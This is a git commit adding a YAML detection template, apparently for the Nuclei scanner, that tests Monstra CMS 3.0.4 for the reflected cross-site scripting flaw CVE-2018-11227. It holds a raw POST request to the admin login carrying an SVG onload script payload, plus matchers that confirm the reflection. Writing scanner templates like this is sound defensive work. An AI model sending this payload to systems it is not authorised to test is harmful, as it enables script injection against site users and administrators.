Create CVE-2018-11227.yaml

patch-1
Ritik Chaddha 2023-01-09 11:33:27 +05:30 committed by GitHub
parent beb733848d
commit 816ed32ba7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 44 additions and 0 deletions

View File

@ -0,0 +1,44 @@
id: CVE-2018-11227
info:
name: Monstra CMS V3.0.4 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Monstra CMS 3.0.4 and earlier has XSS via index.php.
reference:
- https://github.com/monstra-cms/monstra/issues/438
- https://nvd.nist.gov/vuln/detail/CVE-2018-11227
classification:
cve-id: CVE-2018-11227
metadata:
verified: true
tags: cve,cve2018,xss,mostra,mostracms,cms
requests:
- raw:
- |
POST /admin/index.php?id=pages HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
login="><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In
matchers-condition: and
matchers:
- type: word
part: body
words:
- "><svg/onload=alert(document.domain)>"
- "Monstra"
condition: and
case-insensitive: true
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200